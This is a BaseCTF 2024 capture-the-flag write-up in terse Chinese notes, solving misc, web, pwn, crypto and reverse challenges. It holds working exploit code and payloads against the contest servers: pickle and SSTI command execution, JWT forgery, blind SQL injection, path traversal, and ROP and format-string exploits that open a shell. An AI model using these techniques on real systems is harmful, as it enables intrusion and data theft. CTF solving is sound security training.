BaseCTF2024 Writeup
Week4
Misc
Pickle Init
# "__import__('pickle').loads(__import__('sys').stdin.read(50).encode('ASCII'))"
r1 = b"""cos
system
(S'cat flag'
tR."""
from pwn import remote
s = remote('challenge.basectf.fun', 48739)
payload = r1.ljust(50, b'\x00')
s.sendline(payload)
s.interactive()
[Week4] 小cheny的社交
stegsolve 翻出来
MDAxMTAwMTEgMDAxMTEw
MDAgMDAxMTAxMDAgMDAx
MTEwMDAgMDAxMTAxMTAg
MDAxMTAxMDAgMDAxMTAx
MDEgMDAxMTAwMTAgMDAx
MTAwMDAgMDAxMTAxMTE=
识别二进制,再识别
3848645207
web
[Week4] No JWT
代码审计,jwt密钥是假的,直接改base64,注意token取数[1]
GET /flag HTTP/1.1
Host: challenge.basectf.fun:44164
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: 1 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6MTcyNTgwNTkwMH0.OpgToND1Vus3KKYhYN_DROfJE12tjJGtE01ydiqyth0
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
[Week4] flag直接读取不就行了?
php原生类利用 - bcxc9405 - 博客园 (cnblogs.com)
POST /?K=DirectoryIterator&W=%2fsecret HTTP/1.1
Host: challenge.basectf.fun:22382
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
J=SplFileObject&H=%2fsecret%2ff11444g.php
[Week4] 圣钥之战1.0
/static/proc/1/environ
POST /pollute HTTP/1.1
Host: challenge.basectf.fun:39196
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
Content-Type: application/json
Content-Length: 235
{
"username":"1",
"password":"1",
"\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f":{
"__globals__":{
"app":{
"_static_folder":"/"
}
}
}
}
[Week4] only one sql
show columns from flag
import string
import urllib
from time import sleep
import requests
from tqdm import tqdm
session = requests.Session()
session.keep_alive = False
key = ''
key='426173654354467B33663038653762642D613135632D346163332D626334382D636335316532306434343930'
cipin = "flagetoinsrhdcumwypbvkxjqz0123456789FLAGETOINSRHDCUMWYPBVKXJQZ!\"#$&'()*+,-./:;<=>?@[\\]^`{|}~_"
cipin = "1234567890FLAGETOINSRHDCUMWYPBVKXJQZflagetoinsrhdcumwypbvkxjqz!\"#$&'()*+,-./:;<=>?@[\\]^`{|}~_"
cipin = "123456789ABCDEF0"
# dic_t=string.printable.replace('%','').replace('_','')
dic_t = cipin
print(dic_t)
start = 1 # 1+78
end = 256 # 256+78
for index_key in (range(start, end)):
# print(index_key,'==>')
# if len(key)+78 < index_key - 1:
# exit(1)
for one_dic in tqdm(dic_t):
# if(ASCII(substr((select(group_concat(table_name))from(information_schema.tables)),1,1))LIKE(57),SLEEP(2),0)
one_dic_asc = str(ord(one_dic))
# 可单引
pay = "delete from flag where 1=12 or(if((substr(hex(data)," + str(1) + ",1000))LIKE('" + key + one_dic + "%'),SLEEP(2),0))"
# urlencode
burp0_url = "http://challenge.basectf.fun:29136/?sql=" + urllib.parse.quote(pay)
req = session.get(burp0_url, headers=burp0_headers)
if req.status_code != 200:
print('错误', req.status_code)
print(burp0_url)
sleep(5)
req.encoding = 'utf-8'
content = req.text
# print(content)
req.close() # 关闭请求 释放内存
if req.elapsed.total_seconds() > 2:
key = key + one_dic
print(key)
break
Week3
Crypto
Done|[Week3] exgcd
扩展欧几里得 RSA共模攻击(包括原理)-CSDN博客
b'BaseCTF{feb7e1ae-a8f7-4fc4-8d6d-945a45cc3f6d}'
n = 27855350163093443890983002241607629119744539643165776358993469078731521668677421483556132628708836721737685936980427467856642738196111748018522018598646125626995613169001111504706363742194664774823604738939411512861441742683157275818500991834651769368178320088982759626122029956515159435424882855075032400667120376075618896752694718491438251810609878021717559466498493103257912108879328270813061231904227056671621363669388496383136964549879459562004569059185078204867346250733489663015417879915436157806942021693920206071715538430633494012923651469196048546309592946901609803631751035364478773126967010589504275776307
e1 = 3747
e2 = 2991
c1 = 24426579024062518665031958216110619832653602343205488454298659533869220501923184793828421371206493659949730138867555889074137026401207985428160803910695088081370233571905915349589146504374710444468715701305061060934519410886010929009297226496448218819742287990364436349188987723637449590579092391100714056589967894609950537021838172987840638735592599678186555961654312442380755963257875487240962193060914793587712733601168204859917001269928487633954556221987632934190217367502677285906521385169669644977192556145782303526375491484736352799180747403161343130663661867413380222714012960607473395828938694285120527085083
c2 = 6932145147126610816836065944280934160173362059462927112752295077225965836502881335565881607385328990881865436690904056577675885697508058289570333933837515526915707121125766720407153139160751343352211421901876051228566093038929625042619250168565502734932197817082848506826847112949495527533238122893297049985517280574646627011986403578166952789317461581409161873814203023736604394085875778774834314777046086921852377348590998381648241629124408514875110073073851913857329679268519229436092660959841766848676678740851087184214283196544821779336090434587905158006710112461778939184327386306992082433561460542130441825293
gcd_res=gmpy2.gcd(e1, e2)
s0, s1, s2 = gmpy2.gcdext(e1, e2)
print(s0, s1, s2) # 3 91 -114 # 1 -14272 7615 # 1 -183153 330830
if s1 < 0:
s1 = -s1
c1 = gmpy2.invert(c1, n)
elif s2 < 0:
s2 = -s2
c2 = gmpy2.invert(c2, n)
m = gmpy2.powmod(c1, s1, n) * gmpy2.powmod(c2, s2, n) % n
print('[-]m is:', m)
print(long_to_bytes(m))
# 开方 三次方
if gcd_res!=1:
print('gcd_res',gcd_res)
m2=gmpy2.iroot(m, gcd_res)[0]
print(m2)
print(long_to_bytes(m2))
Done|[Week3] wiener?
化简
from Crypto.Util.number import *
import gmpy2
import decimal
a = 829374344780877053838760251345359097311540811993463349625630085472892814959843248358036249898871908548743719153319438638517170060651237635838827482534816419091949205584951292517303330452910012749674475329235689229498752425379611083979518257734473992186831474208400813283887045691145481237726578827559198828469462343342343287720369159899636816373592067698883361360269728719786071024354151682314608072902347335691012713629816579496252896260869382806838857194293618332286500427694077400072428506897829689703872985954772105672992293334668485358785863779749153981721900135318166811250762946069962348114491411585418993494561587403918162681937152503739843
# decimal.Decimal(
p = pow(10,648)
print('a',a)
print('p',p)
# input()
def continuedFra(x, y):
cF = []
while y:
cF += [x // y]
x, y = y, x % y
return cF
def Simplify(ctnf):
numerator = 0
denominator = 1
for x in ctnf[::-1]:
numerator, denominator = denominator, x * denominator + numerator
return (numerator, denominator)
def getit(c):
cf = []
for i in range(1, len(c)):
cf.append(Simplify(c[:i]))
return cf
cf = continuedFra(a, p)
print(cf)
print(getit(cf))
e=65537
c = 11032748573623426359632659657114807044712138586316710250985606809252700461490504487308849626514319062562557448839550994242999334882617031487618174168038491566640081840111747765753878087564318833273878755416584962921669911444225959335274753391800995531023212276838665202257007640354237043291129197348884914956663597240094662207929658519596987351984403258345205873566463643624175318315064440456858013874962784792564480286904620663695194689839431808082976248378509181327101557380978849545906691903896662095520288964101796965095129861467059775556110616007889846240936219381379219605528051627402300580239311202137582442057
for (r, k) in getit(cf):
# print('r, k',r, k)
# input()
if r == 0 or not isPrime(r) or not isPrime(k):
continue
# y = abs(a*r - k*p)
print('r', r)
print('k', k)
n=r*k
phi= (r-1)*(k-1)
print(e)
print(phi)
t=gmpy2.gcd(e,phi)
print('t',t)
d= int(gmpy2.invert(e//t,phi))
y= pow(c,d,n)
flag = long_to_bytes(y)
print(flag)
if b'CTF' in flag:
print(flag)
Done| [Week3]ez_log
sage求离散对数
y = 82941012
n = 228338567
z = 51306718
x=discrete_log(z,mod(y,n))
print (x)
from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b, getPrime
from Crypto.Cipher import AES
from random import randint
flag = b"flag{test_flag}"
pad = lambda x: x+b'\x00'*(16-len(x)%16)
print(pad)
def encrypt(KEY):
cipher= AES.new(KEY,AES.MODE_ECB)
encrypted =cipher.encrypt(flag)
return encrypted
def decrypt(KEY):
cipher= AES.new(KEY,AES.MODE_ECB)
decrypted =cipher.decrypt(enc)
return decrypted
flag = pad(flag)
x = randint(10 ** 7, 10 ** 8)
y = randint(10 ** 7, 10 ** 8)
n = getPrime(28)
z = pow(y, x, n)
enc = encrypt(pad(l2b(x)))
print(f'enc = {b2l(enc)}')
print(f'y = {y}')
print(f'n = {n}')
print(f'z = {z}')
print(decrypt(pad(l2b(x))))
x=38806815
enc = 33416570913716503492297352041317858420349510954381249751537743898024527101872454706181188441210166165803904185550746
y = 82941012
n = 228338567
z = 51306718
enc=l2b(enc)
print(decrypt(pad(l2b(x))))
Done|[Week3] 没有n啊
P10 = 2
P1 = 3
P2 = 73
P4 = 3967
P40 = 6373
P19 = 4744823012787277141
P8 = 95592293
P9 = 216465863
P263 = 48245998253859255581546561942142167304434549996919484957120717763726325509833409296170471619434291990255044694414983821250538266717293535917534918221352198192885071310932646412147737114561229291373456448363184353049796801297876664512630305475226391199481032049429
n = 41078537283946718963867901444418587861374852549298581021160514707533456880649575554160808265785252954671072625328988077610467094845517440017082778974841917530114657609059448190572912125442280853514427857000821711800055969463230442969916805291740261864969371381161948988667040714627181514640499564446192371749
assert (c_trueX == pow(m_trueN, e, n_trueC)) 正确
e d也互素
m = pow(c, d, n+c)
print(long_to_bytes(m))
p =2213
q= 18562375636668196549420651353103745079699436307861988712679853008374811062200440828811933242559987778884352745291002294446663847648222973347077622672770861965709289475399660275902807105938671872351752307727438640668800709201640507442348307858897542641197185441103456388914162094273466567844780643672025473
[Week3] 没有n啊 pro
Misc
Done | [Week3] Base revenge[F]
base64隐写 得到 JnUaAFMFImgANSEuAWYuBE9SyaYpC2ldBrU9
atbash解 QmFzZUNURntZMHVfZDBfYV9HbzBkX2owYiF9 再base64
BaseCTF{Y0u_d0_a_Go0d_j0b!}
Done | [Week3] broken.mp4
Digital Video Repair 修复
BaseCTF{x1a_Ci_1_DIn9_y0Ng_MKV}
Done | [Week3] 纯鹿人[f]
word打开 显示隐藏文字有 密码
ikunikun
docx解压在图片里找到 隐藏压缩包
BaseCTF{d176adc7-5919-4a0c-9556-0301fc4d9c35}
Done | [Week3] 这是一个压缩包【F】
注释有 密码为 BaseCTF??????FTCesaB 是个逆序的.自己写脚本跑.
爆破后密码为 BaseCTF_h11h_FTCesaB
BaseCTF{a7da6763-5013-4963-9c23-8fb3d049bdce}
Done | [Week3] 外星信号
外星录音.mp3 读取摩斯 有一段
-... .- ... . -.-. - ..-. ----.-- ..--- . -... . -.... ..-. -.. -.-. -....- -.... ----- -.. -.-. -....-
BASECTF2EBE6FDC-60DC-
BaseCTF{2ebe6fdc-60dc-
mp3里有一段zip解压出来 flag.mp3
sstv -d 'flag.mp3' -o 1.png
....- ----. .- ....- -....- .- ----. ----. ..--- -....- ...-- -... -... -.. ..... -.... ..-. ...-- ..-. -.. ----- -... ----.-
49a4-a992-3bbd56f3fd0b
BaseCTF{2ebe6fdc-60dc-49a4-a992-3bbd56f3fd0b}
Done|[Week3] 白丝上的flag
依据算法,水印点不会改变坐标,直接加密新图,与加密原图xor
BaseCTF{there_is_the_flag@}
Done | [Week3] 我要吃火腿!
兽音解码
异或脚本再跑一次解密.
def xor_with_ham(input_file, output_file):
ham_bytes = [0x48, 0x61, 0x6D]
with open(input_file, 'rb') as f:
data = bytearray(f.read())
for i in range(len(data)):
data[i] ^= ham_bytes[i % 3]
with open(output_file, 'wb') as f:
f.write(data)
xor_with_ham('Hamorl.jpg', 'Ham.jpg')
分离出wav
sstv -d '00000415.wav' -o 1.png
BaseCTF{SSTV_Happpy!}
pwn
[Week3] stack_in_stack
if __name__ == '__main__':
r.recvuntil(b"It looks like something fell off mick0960.\n")
buff_addr = int(r.recvuntil("\n"), 16)
ret_addr = 0x000000000040101a #: ret
leave_ret_addr = 0x4012f2
main_addr = 0x401245
magic_addr = 0x4011C6
p = p64(buff_addr)
p += p64(ret_addr)
p += p64(magic_addr) # magic
p += p64(ret_addr)
p += p64(main_addr) # main
p += p64(0x4012B5) # read
p += p64(buff_addr)
p += p64(leave_ret_addr)
r.sendline(p)
r.recvuntil(b"You found the secret!\n")
remote_puts_addr = int(r.recvuntil("\n"), 16)
libc_id = 'libc6_2.35-0ubuntu3.8_amd64'
libc_base = remote_puts_addr - searcher.dump(libc_id, "puts")
'''
0xebc81 execve("/bin/sh", r10, [rbp-0x70])
constraints:
address rbp-0x78 is writable
[r10] == NULL || r10 == NULL || r10 is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
'''
onegadget = 0xebc81
r.recvuntil(b"It looks like something fell off mick0960.\n")
buff_addr = int(r.recvuntil("\n"), 16)
p = b'A' * 0x30
p += p64(buff_addr+0x50 +0x70)
p += p64(libc_base + onegadget)
r.sendline(p)
r.interactive()
[Week3] format_string_level2
if __name__ == '__main__':
p = b""
p += b"aaaa%61$p"
r.sendline(p)
libc_start_main = int(r.recvuntil(b"\n").replace(b'aaaa', b''), 16) - 128
libc_id = 'libc6_2.35-0ubuntu3.8_amd64'
libc_base = libc_start_main - searcher.dump(libc_id, '__libc_start_main')
printf_got = elf.got['printf']
system_addr = libc_base + searcher.dump(libc_id, 'system')
p = fmtstr_payload(6, {printf_got: system_addr})
r.sendline(p)
r.sendline('/bin/sh')
r.interactive()
[Week3] PIE
# coding=utf-8
from pwn import *
context.arch = 'amd64'
elf = ELF("./vuln")
if __name__ == '__main__':
# r = process(["./ld-linux-x86-64.so.2", file_name], env={"LD_PRELOAD": "./libc.so.6"})
r = remote("challenge.basectf.fun", "20674")
p = b""
p += b'A' * 0x100
p += b'B' * 8
p += b'\x1c'
r.send(p)
r.recvuntil(b'B' * 0x8)
libc_main_base = unpack(r.recv(6).ljust(8, b'\x00')) - 12
libc_base = libc_main_base - 0x29d1c + 12
libc = ELF("./libc.so.6")
system_offset = libc.symbols['system']
pop_rdi = 0x000000000002a3e5 #: pop rdi ; ret
bin_sh_offset = 0x00000000001d8678 #: /bin/sh
ret = 0x0000000000029139 #: ret
p = b""
p += b'A' * 0x100
p += b'B' * 8
p += p64(ret + libc_base)
p += p64(pop_rdi + libc_base)
p += p64(bin_sh_offset + libc_base)
p += p64(system_offset + libc_base)
r.send(p)
r.interactive()
其中,0x1c的magic,采用爆破的方法:
for i in range(0xff):
try:
r = process(["./ld-linux-x86-64.so.2", file_name], env={"LD_PRELOAD": "./libc.so.6"})
p = b""
p += b'A' * 0x100
p += b'B' * 8
p += p64(i)[:1]
r.send(p)
r.recvuntil(b'BBBBBBBB')
# print(r.recvuntil(b'BBBBBBBB'))
r.sendline(b"111111111111")
print(r.recvuntil(b'111111111111'))
print(hex(i))
except :
continue
[Week3] 你为什么不让我溢出
p = b""
p += b"A" * 0x60
p += b"B" * 0x8
p += b"C"
r.send(p)
r.recvuntil(b"C")
canary = unpack(r.recv(7).rjust(8, b"\x00"))
info_addr("canary", canary)
p = b""
p += b"A" * 0x60
p += b"B" * 0x8
p += p64(canary)
p += p64(0xdeedbeef)
p += p64(0x000000000040101a)
p += p64(0x4011B6)
r.send(p)
r.interactive()
Reverse
Done | [Week3] Dont-debug-me
汇编删除掉反调试.直接jmp到最后.自动出flag
BaseCTF{8ea2710a717f89d83af695d312fe3b625df14a6ba6b3a74e15ed1e2d35cb10}
[Week3] UPX PRO
Done | [Week3] 出题人已疯
直接把题目源代码抄过来。小改下
using System;
namespace ConsoleApplication1
{
internal class Program
{
public static void Main(string[] args)
{
string[] sentences = new string[]
{
"你以为我还会在乎吗?\ud83d\ude2c\ud83d\ude2c\ud83d\ude2c我在昆仑山练了六年的剑\ud83d\ude1f\ud83d\ude1f\ud83d\ude1f我的心早就和昆仑山的雪一样冷了\ud83d\ude10\ud83d\ude10\ud83d\ude10我在大润发杀了十年的鱼\ud83d\ude2b\ud83d\ude2b\ud83d\ude2b我以为我的心早已跟我的刀一样冷了\ud83d\ude29\ud83d\ude29\ud83d\ude29",
"我早上坐公交滴卡的时候和司机大叔说“两个人”,司机惊讶地看着我“你明明就是一个人,为什么要滴两个人的卡?”我回他,“我心中还有一个叫Kengwang的。”司机回我说,“天使是不用收钱的。”",
"(尖叫)(扭曲)(阴暗的爬行)(扭动)(阴暗地蠕动)(翻滚)(激烈地爬动)(痉挛)(嘶吼)(蠕动)(阴森的低吼)(爬行)(分裂)(走上岸)(扭曲的行走)(不分对象攻击)",
"地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!",
"扭曲上勾拳!阴暗的下勾拳!尖叫左勾拳!右勾拳爬行!扭动扫堂腿!分裂回旋踢!这是蜘蛛阴暗的吃耳屎,这是龙卷风翻滚停车场!乌鸦痉挛!老鼠嘶吼!大象蠕动!愤怒的章鱼!无差别攻击!无差别攻击!无差别攻击!"
};
uint[] source = new uint[]
{
24164U, 27173U, 32145U, 17867U, 40533U, 21647U, 17418U, 30032U, 27950U, 62998U, 60750U, 64870U, 52680U,
61797U, 49234U, 59762U, 16704U, 19200U, 32132U, 24038U, 21764U, 30130U, 28113U, 23070U, 27413U, 27917U,
28938U, 50207U, 64834U, 60132U, 64832U, 63334U, 55103U, 22176U, 21991U, 20073U, 22281U, 19476U, 28302U,
24336U, 24720U, 19544U, 23018U, 43976U
};
uint[] array = new uint[source.Length];
Array.Copy(source, array, source.Length);
char[] array2 = string.Join("", sentences).ToCharArray();
for (int i = 0; i < array.Length; i++)
{
// array[i] *= array[i];
// array[i] = (char)((int)array[i] ^ i ^ (int)array2[i % array2.Length]);
array[i] = (uint)((int)array[i] ^ i ^ (int)array2[i % array2.Length]);
array[i] = (uint)Math.Sqrt(array[i]);
}
Console.Out.WriteLine("111");
for (int i = 0; i < array.Length; i++)
{
Console.Out.Write((char)array[i]);
}
}
}
}
Done | [Week3] 世界上最简单的题目
流密码.直接把密文输入进去调试..比较时得到 flag
BaseCTF{easyvmvmvm}
Web
Done| [Week3]滤个不停
目录穿越
POST / HTTP/1.1
Host: challenge.basectf.fun:32225
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
incompetent=HelloWorld&Datch=esvanxro%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fflag
Done|[Week3] 复读机
ssti绕waf
步骤1:BaseCTF{%print ()|attr('%c%ccl''ass%c%c'%(95,95,95,95))|attr('%c%cba''se%c%c'%(95,95,95,95))|attr('%c%csubcl''asses%c%c'%(95,95,95,95))()%}
POST /flag HTTP/1.1
Host: challenge.basectf.fun:23159
Content-Length: 710
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://challenge.basectf.fun:32428
Referer: http://challenge.basectf.fun:32428/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
flag=BaseCTF%7b%25set%20a%3d'o''s'%25%7d%7b%25set%20b%3d'cat%20%25cflag'%25(47)%25%7d%7b%25print%20()%7cattr('%25c%25ccl''ass%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25cba''se%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25csubcl''asses%25c%25c'%25(95%2c95%2c95%2c95))()%7cattr('%25c%25cgetitem%25c%25c'%25(95%2c95%2c95%2c95))(240)%7cattr('%25c%25cin''it%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25cglo''bals%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25cgetitem%25c%25c'%25(95%2c95%2c95%2c95))('%25c%25cbuil''tins%25c%25c'%25(95%2c95%2c95%2c95))%7cattr('%25c%25cgetitem%25c%25c'%25(95%2c95%2c95%2c95))('%25c%25cimp''ort%25c%25c'%25(95%2c95%2c95%2c95))(a)%7cattr('po''pen')(b)%7cattr('read')()%25%7d
Done|[Week3] 玩原神玩的
php代码审计
POST /?tip=%E6%88%91%E8%A6%81%E7%8E%A9%E5%8E%9F%E7%A5%9E HTTP/1.1
Host: challenge.basectf.fun:36252
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hik76mf5lf7tm88hkenvbips9s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 417
len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&len[]=a&m[]=100%25&m[]=love100%2530bd7ce7de206924302499f197c7a966
from hashlib import md5
for i in range(0, len(md5key)):
for c in string.printable:
# md5(ord($array[$ii]) ^ $ii);
calmd5 = md5((str((ord(str(c)) ^ (i)))).encode()).hexdigest()
if calmd5 == md5key[i]:
print(c, end='')
break
Week2
Misc
[Week2] Base_!
用magic提示
from base64, 表 +-0-9A-Za-z
Rotate right 2
mxxencode !!!Give your flag:BaseCTF{BaseCTF_is_So_Good!!}
[Week2] 海上又遇了鲨鱼
文件 - 导出 FTP-DATA
直接搜password -- Ba3eBa3e!@#
BaseCTF{W1r3sharK_3at_r3p3at_paSsw0rd}
[Week2] 黑丝上的flag
stegsolve 翻
BaseCTF{Bl4ck_5ilk_1s_the_be5t}
前辈什么的最喜欢了
png改高
BaseCTF{q1n6_k4n_zh3_w0}
[Week2] Aura 酱的旅行日记 图寻擂台
Google识图
BaseCTF{四川省成都市成华区成华大道十里店路88号}
[Week2] 二维码1-街头小广告
直接扫码
[Week2] 哇!珍德食泥鸭
尾部有docx,flag在[Content_Types].xml中
[Week2] 反方向的雪
文件尾zip逆序,含snow隐写的key
密码爆破6数字123456
SNOW.EXE -p n0secr3t -C flag.txt 1.txt
BaseCTF{Y0u_g0t_1t!}
[Week2] ez_crypto
大小写替换,再解base
BaseCTF{Th1s_1s_4n_ez_b4se64dec0de}
[Week2] Aura 酱的旅行日记 II <图寻擂台>
BaseCTF{四川省成都市吉瑞二路188号成都盛捷高新服务公寓}
辣鸡手动爆破
[Week2] Aura 酱的旅行日记 III <图寻擂台>
瓦屋山风景区
UNDO|[Week2] Aura 酱的旅行日记 IV <图寻擂台>
不对:
BaseCTF{江苏省南京市秦淮区贡院西街夫子庙-秦淮风光带}
UNDO|[Week2] Aura 酱的旅行日记 V <图寻擂台>
不对:
BaseCTF{四川省广安市广安区*故里旅游景区-*铜像广场and*故居陈列馆}
[Week2] Aura 酱的旅行日记 VI <图寻擂台>
BaseCTF{山西省太原市迎泽区青年路49号太原市第五中学校-建校时间1906年}
[Week2] Aura 酱的旅行日记 VII <图寻擂台>
re
upx
upx小改.010替换 upx为UPX...ida一看一眼换表base64.
import base64
STD_BASE64CHARS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
my_base64chars = 'A,.1fgvw#`/2ehux$~"3dity%_;4cjsz^+{5bkrA&=}6alqB*-[70mpC()]89noX'
cipher = "$rg7_dhd~Alidg+zeyhz`vnz_d,7sy0="
cipher = cipher.translate(str.maketrans(my_base64chars, STD_BASE64CHARS))
data = base64.b64decode(cipher)
print(data)
[Week2] 喝杯下午茶
标准tea 板子
BaseCTF{h3r3_4_cuP_0f_734_f0R_y0U!!!!!!}
from Crypto.Util.number import long_to_bytes
def encrypt(v, k):
v0, v1 = v
x = 0
delta = 0x9E3779B9
k0, k1, k2, k3 = k
for i in range(32):
x += delta
x = x & 0xFFFFFFFF
v0 += ((v1 << 4) + k0) ^ (v1 + x) ^ ((v1 >> 5) + k1)
v0 = v0 & 0xFFFFFFFF
v1 += ((v0 << 4) + k2) ^ (v0 + x) ^ ((v0 >> 5) + k3)
v1 = v1 & 0xFFFFFFFF
return [v0, v1]
def decrypt(v, k):
v0, v1 = v
delta = 0x114514
# x = sum(delta for _ in range(32)) & 0xFFFFFFFF
x = delta * 32 & 0xffffffff
k0, k1, k2, k3 = k
for i in range(32):
v1 -= ((v0 << 4) + k2) ^ (v0 + x) ^ ((v0 >> 5) + k3)
v1 = v1 & 0xFFFFFFFF
v0 -= ((v1 << 4) + k0) ^ (v1 + x) ^ ((v1 >> 5) + k1)
v0 = v0 & 0xFFFFFFFF
x -= delta
x = x & 0xFFFFFFFF
return [v0, v1]
if __name__ == '__main__':
key = [0] * 4
key[0] = 0x11223344;
key[1] = 0x55667788;
key[2] = 0x99AABBCC;
key[3] = 0xDDEEFF11;
print(key)
v = [0] * 10
v6 = v
v6[0] = 0x94B1F1E7;
v6[1] = 0x21D5D352;
v6[2] = 0x5247793D;
v6[3] = 0x40D1C97;
v6[4] = 0xF36E7F74;
v6[5] = 0x9C53F70F;
v6[6] = 0x6AEACFD8;
v6[7] = 0x6F9F06F4;
v6[8] = 0xEAFD9E2E;
v6[9] = 0x32B655F7;
for i in range(5):
v = v6[i*2:(i+1)*2]
v = decrypt(v, key)
print(long_to_bytes(v[0]).decode()[::-1],end='')
print(long_to_bytes(v[1]).decode()[::-1],end='')
lk
from natsort import natsorted
from z3 import *
byte_14000A668 = [BitVec('s1_%d' % i, 8) for i in range(0x18)] # 有时得用int值好使
solver = Solver()
solver.add(948 * byte_14000A668[20] + 887 * byte_14000A668[19] + 410 * byte_14000A668[18] + 978 * byte_14000A668[17] + 417 * byte_14000A668[16] + 908 * byte_14000A668[15] + 965 * byte_14000A668[14] + 987 * byte_14000A668[13] + 141 * byte_14000A668[12] + 257 * byte_14000A668[11] + 323 * byte_14000A668[10] + 931 * byte_14000A668[9] + 773 * byte_14000A668[8] + 851 * byte_14000A668[7] + 758 * byte_14000A668[6] + 891 * byte_14000A668[5] + 575 * byte_14000A668[4] + 616 * byte_14000A668[3] + 860 * byte_14000A668[2] + 283 * byte_14000A668[1] == 913686)
solver.add(938 * byte_14000A668[20] + 490 * byte_14000A668[19] + 920 * byte_14000A668[18] + 50 * byte_14000A668[17] + 568 * byte_14000A668[16] + 68 * byte_14000A668[15] + 35 * byte_14000A668[14] + 708 * byte_14000A668[13] + 938 * byte_14000A668[12] + 718 * byte_14000A668[11] + 589 * byte_14000A668[10] + 954 * byte_14000A668[9] + 974 * byte_14000A668[8] + 62 * byte_14000A668[7] + 580 * byte_14000A668[6] + 80 * byte_14000A668[5] + 111 * byte_14000A668[4] + 151 * byte_14000A668[3] + 421 * byte_14000A668[2] + 148 * byte_14000A668[1] == 630335)
solver.add(908 * byte_14000A668[20] + 590 * byte_14000A668[19] + 668 * byte_14000A668[18] + 222 * byte_14000A668[17] + 489 * byte_14000A668[16] + 335 * byte_14000A668[15] + 778 * byte_14000A668[14] + 622 * byte_14000A668[13] + 95 * byte_14000A668[12] + 920 * byte_14000A668[11] + 932 * byte_14000A668[10] + 892 * byte_14000A668[9] + 409 * byte_14000A668[8] + 392 * byte_14000A668[7] + 11 * byte_14000A668[6] + 113 * byte_14000A668[5] + 948 * byte_14000A668[4] + 674 * byte_14000A668[3] + 506 * byte_14000A668[2] + 182 * byte_14000A668[1] == 707525)
